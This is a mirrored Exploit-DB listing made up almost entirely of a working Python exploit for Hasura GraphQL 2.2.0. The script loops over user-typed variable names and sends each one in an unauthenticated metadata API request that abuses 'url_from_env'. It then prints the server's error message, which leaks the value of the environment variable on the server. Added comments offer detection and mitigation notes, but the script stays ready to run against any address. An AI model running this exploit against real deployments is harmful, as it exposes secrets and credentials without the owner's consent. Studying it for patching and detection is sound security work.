Hasura GraphQL 2.2.0 – Information Disclosure

  • 作者: Dolev Farhi
    日期: 2022-03-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/50803/
  • # Exploit Title: Hasura GraphQL 2.2.0 - Information Disclosure
    # Software: Hasura GraphQL Community
    # Software Link: https://github.com/hasura/graphql-engine
    # Version: 2.2.0
    # Exploit Author: Dolev Farhi
    # Date: 5/05/2022
    # Tested on: Ubuntu
    
    import requests
    
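    # Host (optionally host:port) of the Hasura instance under test; the
    # value below is the original listing's placeholder.
    SERVER_ADDR = 'x.x.x.x'

    # Metadata API endpoint. The request below carries no credentials, so it
    # is only answered when the metadata API accepts unauthenticated callers
    # (presumably an instance running without HASURA_GRAPHQL_ADMIN_SECRET --
    # confirm against the deployment being assessed).
    url = 'http://{}/v1/metadata'.format(SERVER_ADDR)

    # Upper bound in seconds for one HTTP round trip, so an unreachable host
    # does not hang the prompt forever.
    REQUEST_TIMEOUT = 30

    # Text that precedes the echoed value in the server's error message.
    URI_ERROR_MARKER = 'not a valid URI:'

    print('Hasura GraphQL Community 2.2.0 - Arbitrary Root Environment Variables Read')

    # How the disclosure works, as far as this listing shows: an
    # `add_remote_schema` operation names an environment variable in
    # `url_from_env`; the script then reads whatever follows
    # 'not a valid URI:' in the response's `error` field, i.e. the server
    # apparently echoes the variable's value when it is not a URL.
    #
    # Defender notes:
    #   * Detection: where request logging is enabled, each attempt is a POST
    #     to /v1/metadata with an `add_remote_schema` operation (name "ttt"
    #     in this listing) whose `url_from_env` names a non-URL variable.
    #   * Mitigation: configure an admin secret, keep /v1/metadata off
    #     untrusted networks, and upgrade; the fixed release is not named on
    #     this page.
    #   * Side effect: if the named variable does hold a valid URI the server
    #     may go on to process the remote schema, so a run is not guaranteed
    #     to be read-only -- TODO confirm and clean up "ttt" afterwards.
    while True:
        try:
            env_var = input('Type environment variable key to leak.\n> ')
        except EOFError:
            # stdin closed (piped input exhausted): end the session cleanly.
            break
        if not env_var:
            continue

        payload = {
            "type": "bulk",
            "source": "",
            "args": [
                {
                    "type": "add_remote_schema",
                    "args": {
                        "name": "ttt",
                        "definition": {
                            "timeout_seconds": 60,
                            "forward_client_headers": False,
                            "headers": [],
                            # The server resolves this name from its own
                            # environment; this is the field under test.
                            "url_from_env": env_var
                        },
                        "comment": ""
                    }
                }
            ],
            # Copied from the original listing; presumably has to match the
            # server's current metadata resource version -- confirm.
            "resource_version": 2
        }

        try:
            r = requests.post(url, json=payload, timeout=REQUEST_TIMEOUT)
            body = r.json()
        except (requests.RequestException, ValueError) as exc:
            # Connection failure, timeout, or a body that is not JSON (for
            # example a proxy error page): report it and keep prompting.
            print('Request failed or response was not JSON: {}'.format(exc))
            continue

        # A success response need not be a dict and need not carry `error`;
        # the original indexed it unconditionally and crashed with KeyError.
        error = body.get('error', 'N/A') if isinstance(body, dict) else 'N/A'

        if isinstance(error, str) and URI_ERROR_MARKER in error:
            print(error.split(URI_ERROR_MARKER)[1])
        else:
            print('Could not parse out VAR, dumping error as is')
            print(error)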